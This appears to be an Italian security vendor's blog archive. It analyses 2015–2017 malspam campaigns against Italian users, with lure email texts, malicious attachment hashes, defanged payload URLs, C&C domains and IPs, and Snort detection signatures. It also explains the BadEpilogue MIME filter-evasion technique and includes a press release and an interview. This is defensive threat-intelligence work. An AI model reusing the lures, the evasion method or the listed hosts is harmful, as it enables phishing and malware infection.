pagamento del bonifico

Le mail questa volta sono molto brevi e sintetiche:

Buon pomeriggio,
IN ALLEGATO DELEGA DEL PAGAMENTO F24
Cordiali saluti

Questa volta l’allegato era il seguente documento Word

pagamento F24.doc    d9c79044972d8fe0e857a05b016772f1

Il quale tentava di scaricare sempre una versione di Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall.info/polo.exe

Anche in questo caso si utilizzava un certificato di Let’s Encrypt

15/06/17 - Fattura proforma

La terza diffusione, descritta in questo articolo di My Online Security, utilizzava i seguenti oggetti:

fattura
fattura corretta
Fattura n.06/17
fattura insoluta
fattura nuovo iban!

Ancora una volta le mail arrivano con un testo molto semplice e ben scritto:

Buongiorno
ti invio in allegato la fattura proforma. Aggiornami quanto prima.
Grazie

Questa volta cambia il formato del downloader, viene usato un file Excel:

Fattura n.XXXXX del 15-07-2017.xls    a05ecf6f1cd0ae183bc8514efb801a65

Che tentava di scaricare ancora una volta Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall.review/1ulxomeobigohiwhufovi.exe

Lo stesso sito e lo stesso certificato visti nella campagna prima campagna di Aprile.

20/06/17 - Fattura BRT

La quarta diffusione finge di essere una richiesta di fatturazione di un corriere italiano. In questo caso viene utilizzato un unico formato per l’oggetto in tutte le mail:

Fattura BRT S.p.A. n. XXXXXX del 20/06/17

In questo caso vediamo una mail un po’ più elaborata, in modo da ricordare le vere mail della compagnia:

Gentile cliente,
come da sua richiesta le inviamo in allegato la fattura in oggetto in formato xls.
Sarà vostra cura la stampa su supporto cartaceo (risoluzione del 04/07/2001 n. 107).
Cordiali saluti
BRT S.p.A.
Il presente messaggio è diretto esclusivamente al suo destinatario e può; contenere informazioni di natura riservata. Chiunque lo abbia ricevuto per errore è pregato di darne notizia immediatamente al mittente e di distruggere la copia pervenutagli. Qualsiasi altro suo utilizzo è vietato.
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original Any other use of the email by you is prohibited.

L’allegato è nuovamente un file Excel, in due versioni:

Fattura_XXXXXX.xls        7c09d53a7929c3bdb3dd418c6e3161f6
3D fattura XXXXXX.xls     4fdeccecfa0fe4532a569e2060be74d5

Il payload finale della prima versione risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:

hxxps://cedacriall.win/1aqalpiniahelfuimoksa.exe

Ancora una volta vediamo l’uso di un certificato Let’s Encrypt

Mentre il secondo downloader recupera lo stesso malware dalla seguente risorsa:

hxxps://cedacriall.faith/1aqalpiniahelfuimoksa.exe

In questo caso però lo spammer non ha creato un certificato ad hoc per il dominio, che risponde con lo stesso certificato del primo sample:

21/06/2017 - Fattura CSA

La quinta campagna registrata utilizza nuovamente una dichiarazione generica di fattura

fatt n. XX del 21 giugno 2017
f-ra n. XX del 21 giugno 2017
fattura n. XX del 21 giugno 2017

Le mail sono estremamente semplici e brevi

Buongiorno, allego alla presente la fattura in oggetto cordiali saluti

Nuovamente viene utilizzato un downloader Excel

2017 - fatt. XX.xls        dbb09aa8e0131b3c246f893705318254
fatt. - 2017 n.XX.xls      b7995a448008cb5ed570c4ad96f97b56

Il payload finale risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:

hxxps://cedacriall.download/index.gif

Ancora una volta vediamo l’uso di un certificato Let’s Encrypt

22/06/2017 - Fattura del 22/06

Abbiamo inoltre rilevato una sesta campagna, che utilizza ancora la dicitura generica di fattura

Invio Fattura
Fattura del 22/06/17
Fattura XXX del 22/06/17
Fattura numero XXX del 22/06/2017

Il testo delle mail è ancora molto semplice e breve

Alleghiamo fattura in formato XLS.
Ufficio Amministrazione

Il vettore d’infezione è ancora un file Excel

3D FATT-06-2017-689.xls       8b1436cca913772d6ec53deb3e2aecba

Tuttavia questa volta il dominio sembra pseudo casuale, anche se la struttura dell’URL è molto simile alle precedenti

hxxps://3eee22abda47.bid/index.frt

E viene ancora utilizzato un certificato Let’s Encrypt

Anche se potrebbe sembrare scollegata, questa campagna pare essere comunque legata alle precedenti, infatti il server è lo stesso della campagna del 21/06. Infatti richiedendo la medesima URI al dominio utilizzato in tale campagna otteniamo lo stesso file.

Prevention & Remediation

Le mail di spam e phishing, al momento, sono i maggiori mezzi di diffusione del malware, questo perché sfruttano uno dei fattori più difficili da controllare: l’elemento umano.

Un buon sistema di filtraggio della posta elettronica è un elemento importante per ridurre le probabilità che gli utenti ricevano email malevole. Tuttavia è bene sensibilizzare periodicamente gli utenti al fenomeno dello spam, ricordando quanto segue:

  • Non aprire mai né link né allegati ricevuti via mail da sconosciuti o non attesi
  • Non abilitare mai le macro su documenti giunti via mail
  • In caso di dubbi o sospetti sulla provenienza di una mail contattare l’ufficio IT o un responsabile per ulteriori controlli

In caso si abbia comunque aperto un allegato simile a quelli sopra citati la prima cosa da fare è contattare il proprio ufficio IT per fare analizzare la macchina con appositi strumenti; è altresì consigliato il cambio di tutte le credenziali utilizzate sull’host potenzialmente infetto. Se il pc è stato utilizzato per accedere a siti di natura finanziaria è bene anche verificare da una postazione sicura eventuali transazioni anomale.

Possibili conclusioni

L’utilizzo di domini cedacriall e l’uso della lingua italiana fanno presupporre che il bersaglio di queste campagne possano essere alcuni istituti bancari italiani.

D’altronde è possibile che il dominio sia utilizzato esclusivamente come convenzione dagli attaccanti per distinguere i download da parte dei target italiani.

Resta il fatto che siamo davanti ad un abuso abbastanza evidente del progetto Let’s Encrypt, nato per favorire la sicurezza delle connessioni e del web, che però al momento non è ancora riuscito a stabilire delle politiche di controllo efficaci per stabilire la natura dei richiedenti dei certificati.

Basta fare una breve ricerca sul web per scoprire che non si tratta di un singolo (e ripetuto) caso di abuso.

Per quanto il web abbia bisogno di sicurezza non si può trascurare il processo di verifica che ogni Certification Authority dovrebbe essere tenuta a compiere nei confronti di chi vi fa richiesta per un certificato digitale.

IOC

Firma IDS

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"CERTEGO TROJAN Zeus/Panda SSL download (cedacriall.TLD)"; flow:established,from_server; content:"|55 04 0a|"; content:"|0d|Let|27|s Encrypt"; distance:1; within:14; fast_pattern; content:"cedacriall"; nocase; classtype:trojan-activity;)

MD5

Downloader
a7960e5a86d7aee713f3c0fcee6c96e4
5c66df3788a08c83a97a1074006e09e8
3fa667c19c7e6cfc41dedba1e282bbd3
d9c79044972d8fe0e857a05b016772f1
a05ecf6f1cd0ae183bc8514efb801a65
7c09d53a7929c3bdb3dd418c6e3161f6
4fdeccecfa0fe4532a569e2060be74d5
dbb09aa8e0131b3c246f893705318254
b7995a448008cb5ed570c4ad96f97b56
8b1436cca913772d6ec53deb3e2aecba
Malware
220e79a5d9dc77b9c84b30245fc7064b
42d84d98b4db642836bd70abcd115750
a73713c62f8726e6825752a1ed356ac9
b611fb923b79921911f7bd4a7969ead4
c191d6dbca9759d63d0ddc1b9352a093
ed554c9d86f0b84db616564f41d746cb
458ffe4f16ae495a83659836a532fbeb

Domini

cedacriall.info
cedacriall.win
cedacriall.review
cedacriall.faith
cedacriall.download
3eee22abda47.bid

Indirizzi IP

119.28.82,241
13.59.248,84
34.201.210,159
52.34.34,57
52.91.231,178

COMUNICATO STAMPA

“No More Ransom”, l’iniziativa mondiale che combatte il ransomware, fa il pieno di partner e lancia 15 nuovi tool di decrittazione

Modena, 4 aprile 2017 - Nove mesi dopo il lancio del progetto “No More Ransom” (NMR) un numero sempre crescente di forze dell'ordine e partner privati hanno aderito all'iniziativa, permettendo a molte vittime di ransomware di recuperare i propri file senza pagare il riscatto ai criminali.

Tra i sostenitori dell’iniziativa anche il CERT di Certego, la società del Gruppo VEM Sistemi specializzata nei servizi di Threat Intelligence e Incident Response, che ha messo a disposizione di NMR le proprie competenze in materia di gestione degli incidenti di Cyber Security.

La piattaforma www.nomoreransom.org è ora disponibile in 14 lingue e contiene 39 strumenti di decrittazione gratuiti. Dall’ultimo rapporto NMR del mese di dicembre, più di 10.000 vittime provenienti da tutto il mondo sono state in grado di decifrare i loro dispositivi grazie agli strumenti messi a disposizione gratuitamente sulla piattaforma.

L’iniziativa “No More Ransom (NMR)” è stata lanciata a luglio 2016 da Polizia Nazionale Olandese, Europol, Intel Security e Kapersky Lab, introducendo un nuovo modello di cooperazione tra il settore privato e forze dell’ordine per combattere insieme il cybercrime. Dal lancio, decine di partner provenienti da tutti i continenti hanno aderito a NMR. Questo dimostra che il ransomware è un problema mondiale che deve essere combattuto insieme. Le statistiche mostrano che la maggior parte dei visitatori della piattaforma provengono dalla Russia, Paesi Bassi, Stati Uniti, Italia e Germania.

Precedentemente disponibile in inglese, olandese, francese, italiano, portoghese e russo, la pagina web è stata ora tradotta anche in finlandese, tedesco, ebraico, giapponese, coreano, sloveno, spagnolo e ucraino. A breve saranno disponibili altre lingue al fine di assistere meglio le vittime del cybercrime in tutto il mondo.

Dall’ultima release, sono stati aggiunti 15 nuovi strumenti alla piattaforma, offrendo ulteriori possibilità di decrittazione alle vittime del ransomware:

  • AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor and Cryptomix Decryptor
  • Bitdefender: Bart Decryptor
  • CERT Polska: Cryptomix/Cryptoshield decryptor
  • Check Point: Merry X-Mas Decryptor and BarRax Decryptor
  • Eleven Paths – Telefonica Cyber Security Unit: Popcorn Decryptor
  • Emsisoft: Crypton Decryptor and Damage Decryptor
  • Kaspersky Lab: Updates on Rakhni and Rannoh Decryptors

Nuovi partner del settore pubblico e privato

AVAST, CERT Polska e Eleven Paths – Telefonica Cyber Security Unit, si stanno unendo a No More Ransom, facendo salire a 7 il numero di associated partners.
30 nuovi partner hanno deciso di sostenere il progetto, portando il numero di partner sostenitori a 76.
Dal punto di vista delle forze dell'ordine si sono uniti Australia, Belgio, INTERPOL, Israele, Corea del Sud, Russia e Ucraina; altri sono Acronis International GmbH, Crowdstrike, Cyber Security Canada, DataGravity, Deloitte, eco - Associazione del settore Internet (eco eV), ENISA, Global Cyber Alliance (GCA), Japan Cyber Control Centre (JC3), KÜRT Data Recovery and Information Security Co., mnemonic AS, Neutrino S.r.l., Portugal Telecom, Secura Group Limited, SentinelOne, Verizon Enterprise Solutions.

CERT

Un forte sostegno deriva dalla comunità CERT, rappresentata da AfricaCERT, BA-CSIRT (CSIRT della città di Buenos Aires), Centro Nacional de Cibersegurança, Certego Incident Response Team, Cybersecurity Malesia e Japan Computer Emergency Response Team Coordination Center (JPCERTCC ).

L'arrivo di INTERPOL è avvenuta a seguito dell’Interpol-Europol Cybercrime Conference 2016, che esemplifica la natura pratica e focalizzata sull’utente di questo evento annuale congiunto.

Ulteriori informazioni e suggerimenti sono disponibili su www.nomoreransom.org.

Nata nel 2013, Certego è una startup italiana specializzata in servizi gestiti di Cybersecurity e di Threat Intelligence, connotata da un approccio innovativo e da un team di analisti con esperienza pluriennale nell’analisi e nel contrasto del Cybercrime.

Attraverso la propria offerta di Managed Security Services, Certego adatta continuamente le strategie di difesa dei propri clienti in modo da ridurre significativamente gli effetti degli attacchi e migliorare costantemente l’efficacia dei sistemi di protezione. Grazie a questo approccio, chiamato Adaptive Cyber Defense, Certego è in grado di offrire livelli di sicurezza informatica non raggiungibili dagli approcci tradizionali, basati prevalentemente sull’utilizzo di tecnologie di prevenzione. Attraverso la piattaforma Certego PanOptikon, i clienti Certego sono in grado di intercettare rapidamente e contrastare efficacemente la presenza di Ransomware, Phishing, Advanced Persistent Threat e malware generico.

Con più di 70.000 sistemi sotto protezione e la gestione di migliaia di incidenti di sicurezza all’anno, Certego si occupa in modo innovativo ed efficace della sicurezza di grandi aziende e PMI in Italia e all’estero.

Certego, la società del gruppo VEM sistemi specializzata nell’erogazione di servizi di cyber security, spiega in che modo è possibile gestire e contrastare gli attacchi informatici.

Nata nel maggio 2013, con sede a Modena, Certego è una startup innovativa che fornisce servizi gestiti di sicurezza informatica. Il modello di business e la sua offerta sono piuttosto unici nel panorama italiano, risultato del lavoro di un team di analisti con esperienza pluriennale nel campo degli attacchi informatici e dell’analisi delle frodi online. Bernardino Grignaffini, CEO e fondatore, ha tracciato un quadro del panorama del Cyber Crime in Italia e ci ha spiegato le peculiarità dell’approccio Certego.

Com’è il panorama della Cyber Security in Italia e quali sono le minacce più pericolose?
Grazie all’estensione della propria rete di monitoraggio, Certego rappresenta un punto di osservazione privilegiato sul cyber crime in Italia. Possediamo infatti dati e statistiche nazionali che ci permettono di cogliere i trend in corso e di anticipare i pericoli più significativi per i nostri clienti. Nel corso del 2016, il team di Incident Response di Certego ha infatti svolto circa 90.000 attività di investigazione e gestito circa 1.100 attacchi informatici. Negli ultimi 12 mesi gli strumenti di attacco utilizzati più di frequente dai cyber criminali sono stati certamente i Ransomware, software malevoli che cifrano specifici file e documenti delle vittime per poi richiedere il pagamento di un riscatto. Questo è il fenomeno di Cyber Crime attualmente più diffuso in quanto è in grado di produrre un ottimo ritorno di investimenti per la criminalità informatica. Abbiamo inoltre osservato la ricorrenza di schemi di frodi, chiamate in genere CEO Fraud, che vengono svolte impersonando figure apicali di un’azienda e tentando di convincere i dipendenti a compiere particolari azioni, come ad esempio fornire credenziali di accesso o addirittura eseguire bonifici e trasferimenti di denaro. Abbiamo poi molte evidenze di Data Breach, ovvero di attività di violazione dei dati che tipicamente si sviluppano nel corso di settimane o mesi, durante i quali i sistemi dell’organizzazione attaccata sono scansionati alla ricerca di informazioni sensibili.

Si tratta di un vero e proprio business criminale…
Stiamo osservando un continuo incremento della capacità di monetizzare gli attacchi da parte dei cyber criminali, che sono riusciti a raggiungere un vero e proprio “consolidamento” del proprio business. La loro attività è governata da principi identici a quelli che regolano l’imprenditoria, ci troviamo di fronte a un’economia della criminalità informatica in cui esistono ruoli altamente specializzati. Dietro un attacco raramente c’è un solo individuo, ma più spesso una rete di operatori. C’è chi fornisce il malware, chi lo distribuisce, chi produce il supporto per monetizzare l’attività, chi compra i dati rubati, ecc. Stiamo ormai assistendo ad una progressiva contaminazione della criminalità informatica da parte della criminalità organizzata tradizionale. Il ransomware, ad esempio, è la trasposizione di un crimine tradizionale (il rapimento e la richiesta di un riscatto) in ambito informatico. I criminali che in passato rischiavano la vita con furti e rapine ora si rendono conto che nel cyber spazio possono ottenere guadagni migliori correndo allo stesso tempo meno rischi. Purtroppo, nonostante gli investimenti e gli sforzi delle aziende, i ricavi della criminalità informatica continuano ad aumentare, causando una sorta di paradosso. L’approccio di Certego vuole essere una risposta proprio a questo paradosso.

Come dovrebbero muoversi le aziende e cosa stanno sbagliando?
L’errore più diffuso dalle aziende consiste nell’adottare una strategia di difesa incompleta: il concetto di difesa informatica, soprattutto in Italia, coincide quasi esclusivamente con l’adozione di strumenti di prevenzione come firewall, IPS, sistemi antivirus, etc. il cui scopo principale è quello di bloccare la minaccia. Purtroppo nessuna soluzione tecnologica può garantire una protezione al 100% e quando un attacco riesce a superare i sistemi di prevenzione, l’azienda non ha più strumenti efficaci per rendersi conto di quanto stia effettivamente accadendo. Certego, grazie ai concetti di Rapid Detection & Incident Response, ha una visione più olistica ed è in grado di intervenire sia per limitare le probabilità di attacco, sia per ridurre il danno che ne può derivare.

Cosa fa Certego?
Affianchiamo al concetto di prevenzione di stampo tradizionale quello di Rilevamento (Rapid Detection) e di Capacità di Risposta (Incident Response Coordination), all’interno di un modello che chiamiamo “Adaptive Cyber Defense”. Oltre a cercare di ridurre le probabilità e l’efficacia di un attacco, adottiamo soluzioni tecnologiche in grado di rilevare rapidamente la presenza di anomalie e utilizziamo procedure operative in grado di ridurre gli impatti sul business. Identificare con precisione e rapidità la presenza di un malware che sta iniziando a cifrare il file system di un PC consente ad una organizzazione di intervenire efficacemente, evitando che il danno possa diffondersi a tutta l’azienda. Per questo Certego affianca a soluzioni di prevenzione – che spesso i clienti hanno già implementato – un servizio gestito che si occupa di rilevare la presenza di anomalie ascrivibili ad attacchi informatici e di coordinare insieme al cliente la risposta più efficace per ridurne gli impatti.

In che modo mettete in pratica questa visione?
Abbiamo sviluppato Certego PanOptikon, una piattaforma tecnologica proprietaria in grado di rilevare, analizzare e rispondere efficacemente agli incidenti di sicurezza informatica. Grazie ad una profonda conoscenza delle tecniche, tattiche e procedure di attacco utilizzate dalla criminalità informatica, siamo in grado di rilevarne le tracce nelle organizzazioni nostre clienti e di coordinare le risposte più efficaci per ridurne gli impatti. Spesso non è sufficiente limitarsi a bloccare un attacco. È infatti fondamentale riuscire a darne un contesto preciso, comprendere qual è l’obiettivo dell’attaccante, cosa ha fatto fino a quel momento, quale vulnerabilità abbia sfruttato e qual è sia stata la falla di sicurezza. La piattaforma PanOptikon di Certego è in grado di dare una risposta a tutte queste domande, riducendo in modo significativo gli effetti dell’attacco e consentendo all’organizzazione di adattare continuamente le proprie difese informatiche migliorandone costantemente l’efficacia.

Chi sono i vostri clienti? Ci sono settori più sensibili di altri nell’adottare questo tipo di approccio?
I nostri servizi gestiti non hanno vincoli o prerequisiti particolari e pertanto possiamo operare sia in ambito PMI che su grandi aziende. La Cyber Security non ha un mercato o un settore di riferimento anche se le realtà più mature da questo punto di vista sono quelle che operano all’interno dell’ambiente finanziario e le organizzazioni che gestiscono dati di terze parti. Non dimentichiamo però che sono soprattutto le piccole e medie aziende ad essere il bersaglio degli attacchi informatici e, purtroppo, sono proprio quelle organizzazioni che spesso faticano a comprendere la reale esposizione ai rischi del Cyber Crime.


Leggi l'articolo su Digitalic http://www.digitalic.it/wp/mercato-2/sicurezza/certego-e-lapproccio-adattivo-contro-il-cyber-crime/102541

A partire dal mese di Maggio 2016, la piattaforma di Cyber Threat Intelligence di Certego ha iniziato a rilevare una serie di attacchi di Viral Spam caratterizzati da una nuova tecnica di evasione. Questi attacchi sfruttano una particolare area della struttura MIME/Multipart definita dal RFC 2046 per inserire allegati malevoli in modo da ingannare i sistemi di Content Filtering ed impedire l'analisi dei file.

Certego ha inoltre verificato che alcuni tra i principali client di posta e servizi di Web Mail gestiscono in modo differente la struttura MIME/Multipart e sono invece in grado di rilevare la presenza del file allegato che quindi attraversa le logiche Antispam senza essere analizzato. A questa tecnica di evasione, Certego ha dato il nome di BadEpilogue.

Analisi della tecnica di evasione

La figura ad inizio pagina mostra una parte del sorgente di un messaggio email contenente un allegato malevolo che utilizza la tecnica di evasione BadEpilogue.

Le righe dalla 53 alla 57 contengono la fine del messaggio HTML, mentre l’allegato si trova all’interno di quello che l’RFC 2046 definisce come “Epilogue” di un messaggio MIME/Multipart: esso si trova infatti dopo il Boundary di chiusura del messaggio Multipart che corrisponde alla riga 59 e termina con il doppio carattere “-”.

Stando all’RFC 2046, l’epilogo del messaggio non dovrebbe contenere testo utile e, soprattutto, dovrebbe essere ignorato dal software che aderisce allo standard MIME:

NOTE: These "preamble" and "epilogue" areas are generally not used because of the lack of proper typing of these parts and the lack of clear semantics for handling these areas at gateways, particularly X.400 gateways. However, rather than leaving the preamble area blank, many MIME implementations have found this to be a convenient place to insert an explanatory note for recipients who read the message with pre-MIME software, since such notes will be ignored by MIME-compliant software.

Nel caso in oggetto, invece, subito dopo il Boundary di chiusura del MIME/Multipart e proprio all’inizio dell’area di Epilogue, si trova un nuovo Boundary (vedi riga 61) che apre un’altra sezione Multipart contenente l’attachment malevolo.

Abbiamo verificato che diverse librerie utilizzate frequentemente nei programmi Antispam ed Antivirus per l'analisi degli allegati, rispettando le specifiche dell’RFC 2046, non rilevano la presenza dell’attach nell'area di Epilogue. Purtroppo, diversamente da queste librerie, alcuni tra i più diffusi client di posta come Outlook, Thunderbird ed Evolution riconoscono l’allegato e lo rendono disponibile all'utente. Questa diversa modalità di gestione degli allegati si traduce pertanto in questa nuova tecnica di evasione.

Responsible Disclosure Policy

Una volta identificata la tecnica di evasione, nel rispetto della nostra Responsible Disclosure Policy, abbiamo provveduto ad informare i produttori dei client di posta e dei sistemi Antispam in modo da indirizzare le vulnerabilità riscontrate.

Abbiamo pertanto segnalato il problema a Microsoft per quanto riguarda l'applicazione Outlook. Microsoft ha provveduto a rilasciare le patch relative ai propri prodotti nell'ultimo Security Bulletin di Settembre (CVE-2016-3366 all'interno del bollettino MS16-107) evitando che Outlook possa riconoscere gli allegati nascosti tramite BadEpilogue.

Per quanto riguarda invece gli applicativi Antispam, Certego ha contattato Google e TrendMicro: entrambi i produttori hanno confermato il problema e lo hanno prontamente corretto.

Come posso sapere se la mia infrastruttura di posta è vulnerabile a BadEpilogue?

Per poter risultare efficace, BadEpilogue richiede due condizioni.

La prima condizione è che il sistema Antispam, rispettando le specifiche del RFC 2046, non sia in grado di rilevare la presenza dell'attachment nascosto all'interno dell'area Epilogue del messaggio.

La seconda condizione è che il client di posta o la web mail siano invece in grado di riconoscere l'allegato e presentarlo all'utente.

Per verificare se il proprio sistema Antispam sia vulnerabile alla tecnica di evasione BadEpilogue, è possibile utilizzare il seguente EML file che contiene un file EICAR nascosto nell'area Epilogue. Attraverso un client di posta generico (meglio se installato su una macchina virtuale senza software antivirus in modo da evitare il rilevamento e il blocco del file EICAR), si può provare ad inviare il file ad un indirizzo di mail di cui si voglia valutare il sistema di Content Filtering. Nel caso in cui il messaggio raggiunga il destinatario, è probabile che il sistema di Content Filtering sia vulnerabile alla tecnica BadEpilogue.

Per verificare se il proprio client di posta sia vulnerabile a BadEpilogue è sufficiente scaricare e salvare il file a questo link contenente un messaggio inserito nell'area Epilogue. Se il vostro client è in grado di leggere il file scaricato, allora significa che è vulnerabile.

Rilevamento dell'attacco mediante signature Snort

Certego ha elaborato una signature Snort che rileva l’esistenza di email con allegati che sfruttano BadEpilogue:

alert tcp any any -> $HOME_NET [25,587] (msg:"CERTEGO CURRENT_EVENTS Incoming SMTP Message with Possibly Malicious MIME Epilogue 2016-05-13 (BadEpilogue)"; flow:to_server,established; content:"|0d 0a|Content-Type|3a 20|multipart|2f|mixed|3b|"; pcre:"/\x0d\x0a--(?P<boundary>[\x20\x27-\x29\x2b-\x2f0-9\x3a\x3d\x3fA-Z\x5fa-z]{1,70})--(?:\x0d\x0a(?!--|\x2e|RSET).*)*\x0d\x0a--(?P=boundary)\x0d\x0a/"; reference:url,www.certego.net/en/news/badepilogue-the-perfect-evasion/; classtype:bad-unknown; sid:9000501; rev:3;)

Le campagne rilevate

Come accennato in precedenza, questa tecnica di evasione è stata attivamente sfruttata “in the wild”, a partire da Maggio 2016 in almeno undici diverse campagne indirizzate esclusivamente ad utenti italiani. Le campagne fanno uso di messaggi scritti in un italiano corretto e contengono diversi allegati (ad esempio una fattura, la copia di un vaglia postale o altri documenti di questo tipo). L’allegato, sempre in formato ZIP, contiene un file eseguibile in formato EXE che rappresenta il malware vero e proprio. Questa modalità di trasporto era tipica delle campagne di Viral Spam di qualche tempo fa, ma di fatto era stata resa poco efficace dal fatto che quasi tutti i filtri Antispam sono in grado di bloccare allegati eseguibili anche quando inseriti in file compressi. Usando la tecnica di BadEpilogue è invece possibile generare campagne ad alto potenziale e dall'elevato numero di vittime. Inoltre, il fatto che questa tecnica sia per ora utilizzata prevalentemente verso obiettivi italiani, ha evidentemente permesso agli attaccanti di non essere rilevati dai principali vendor internazionali.

Mentre le prime campagne diffondevano un allegato contenente un Trojan Downloader della famiglia di Fareit che a sua volta scaricava un Infostealer della famiglia di Andromeda, le ultime campagne si sono invece spostate su Ransomware, arrivando negli ultimi giorni a diffondere in modo piuttosto massiccio il malware Zlader.

La figura seguente mostra le varie campagne rilevate dalla spamtrap di Certego che fanno uso della tecnica BadEpilogue.

La seguente immagine mostra invece la geolocalizzazione degli indirizzi IP da cui venivano inviate le mail relative a ciascuna campagna. La campionatura del rilevamento è abbastanza costante, e consente di visualizzare un pattern molto simile, che sembra corrispondere ad una singola botnet che, nel corso del tempo, si espande e contrae: questo ci porta a ipotizzare che dietro alle campagne che sfruttano questa tecnica di evasione esista probabilmente un solo attore, come sembra confermare anche il fatto che i target di questi attacchi sono al momento esclusivamente italiani.

Security Summit torna a Milano!

Certego è sponsor del Security Summit Milano 2016 e vi aspetta nell'area espositiva dalle 9:00 alle 18:00 assieme a Comsec Group con la Cyber Security Clinic!

La partecipazione a tutti gli eventi del Security Summit è gratuita ma è necessario  pre-iscriversi. Guarda il programma completo!

Ti aspettiamo il 15-16-17 marzo nella nuova location: ATAHotel Expo Fiera.

La spamtrap di Certego ha raccolto e analizzato a partire dal 7 Ottobre scorso tre particolari campagne di spam rivolte specificatamente agli utenti italiani. Tutte le campagne utilizzano un downloader in Javascript chiamato JS/Nemucod, allegato direttamente alle email come documento in formato ZIP. Quando il file viene aperto con un doppio click dall'utente lo script viene aperto ed eseguito in una istanza di Internet Explorer, grazie all'associazione di default di questo tipo di file nei sistemi Windows.

Siamo stati in grado di individuare tre differenti campagne, in tutti i casi le email erano scritte in italiano, così come il documento PDF usato come esca.

Campagna 0710TIT

Questa campagna è comparsa sulla Spamtrap a partire dal 7 Ottobre. Alcuni esempi dei nomi dei file usati come allegato sono:

fattura_28234_del_07_10_2015.zip

I nomi utilizzati per i file javascript:

fattura_del_07_10_2015_no_45859260.js
fattura_no_757961.js

La variante di JS/Nemucod utilizzata in questa campagna utilizza due diversi livelli di offuscamento, entrambi basati su bitwise XOR con una chiave di lunghezza variabile da 12 a 14 bytes. Nel primo livello tutto il codice Javascript è offuscato, mentre il secondo offusca solo i nomi di dominio dei Command&Control server.

Una volta eseguito, Nemucod istanzia tre differenti controlli ActvieX: WScript.Shell, MSXML2.XMLHTTP e ADODB.Stream. In breve, questi vengono usati per salvare un file eseguibile nella cartella temporanea %TEMP% e per mandarlo in esecuzione. Immediatamente dopo Nemucod aprirà un file PDF nel browser per far credere all'utente che sta visualizzando una fattura reale e legittima, come mostrato nell'immagine sottostante

Questa versione scarica un semplice file EXE che viene poi eseguito direttamente in background mediante il controllo ActiveX WScript.Shell, mentre usando il controllo ADODB.Stream viene aperto il file PDF usato come esca.

Campagna 0810DTIT

Risale all'8 Ottobre, i nomi degli allegati sono molto simili a quelli utilizzati nella campagna precedente:

fattura_82902_del_08_10_2015.zip

Anche i file JavaScript hanno una struttura molto simile:

fattura_del_08_10_2015_no_7075701.js
fattura_no_9526.js

Tuttavia in questo caso non viene scricato un file EXE, ma una libreria DLLche viene poi invocata usando rundll32.exe mediante il controllo ActiveX WScript.Shell. L'entry point della DLL è la funzione con un nome fuori standar "DLLRegisterServer". Per quanto riguarda la visualizzazione del file PDF invece, il comportamento rimane lo stesso.

Campagna 1410DTIT
L'ultima campagna è comparsa all'alba del 15 Ottobre, anche se il nome suggerisce che possa essere stata distribuita già dal 14. I nomi utilizzati per il file compresso e il suo contenuto sono entrambi in una forma differente, ecco alcuni esempi: 

copia_del_contratto.zip
info11_53343060.js
documento_7466.js
iscrittura_45568664.js
informazioni_5022.js

Anche in questo caso viene scaricata una libreria DLL invocata poi tramite rundll32.exe, con lo stesso entry point e le medesime modalità di visualizzazione del file PDF:

Il Payload
L'analisi tramite la nostra Sandbox ha mostrato che i file eeseguibili scaricati da Nemucod sono utilizzati per recuperare un Trojan Downloader chiamato Fareit o Pony Downloader, che a loro volta hanno il compito di scaricare un altro insime di file eseguibili che contengono l'Infostealer Gozi. Il computer viene riavviato alcuni istanti dopo l'installazione, e Gozi comincia a comunicare con i suoi C2 Server solo dopo questo riavvio. Questa tecnica potrebbe essere un tentativo di eludere l'individuazione da parte degli ambienti di analisi virtuali come i sistemi di sandboxing.

Trivia

Sembra che i registi di queste campagne abbianoo commesso qualche errore nel setup dei Command and Control server usati da Nemucod. Abbiamo infatti notato che alcune volte i server rispondevano con un HTTP header che definiva il file scaricato come application/x-dosexec, ma una analisi più approfondita del payload ha rivelato un errore generato dallo script probabilmente usato per il packing del file, come mostrato nella figura:

IOCs
I domini dei C&C server usati da Nemucod nella prima campagna (0710TIT):

dcmyx.com
ibmdatacap.com
www.landtourjapan.com
thevillageveterinaryhospital.com
majorcase.org
albirtchad.org 
czarplast.com 
jlinksms.com 
alberchad.org

Seconda campagna (0810DTIT):

bugrasilte.com
skbmw.com
wellnessherbal.com
istanbulklima.org
sieumaukimdung.com
skbmw.com

Terza campagna (1410DTIT):

erikssonelectric.com
sieumaukimdung.com 
www.landtourjapan.com
albirtchad.org 
creativefoodstylist.com 
wellnessherbal.com 
belarusstudy.com 
adenyaoteleet.com 
tripsnepal.com

C&Cs di Gozi e Fareit/Pony Downloader

famoussuperstars.ru
torpedazil.ru
gofermertoop.ru
109.120.142.168
109.120.155.30
83.69.230.16

Signature Snort

Le seguenti signature per Snort dovrebbero essere utili per identificare l'esecuzione di Nemucod, le prime due sono specifiche per le richieste di Nemucod legate alle campagne in italiano che abbiamo analizzato in precedenza, mentre la terza e la quarta servono per identificare il download dell'eseguibile o del PDF esca.  

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"CERTEGO MALWARE JS/Nemucod.M.gen requesting EXE payload"; flow:to_server,established; content:"GET"; http_method; content:".php?"; http_uri; nocase; content:"key="; http_uri; nocase; content:!"pdf="; http_uri; nocase; content:!"Referer|3a| "; nocase; http_header; pcre:"/\/get(_new)?\.php\?[a-zA-Z]{4,}=0\.[0-9]{10,}&key=[a-zA-Z0-9]{4,}$/U"; flowbits:set,CERTEGO.nemucod.exerequest; classtype:trojan-activity; sid:9000101; rev:2;)
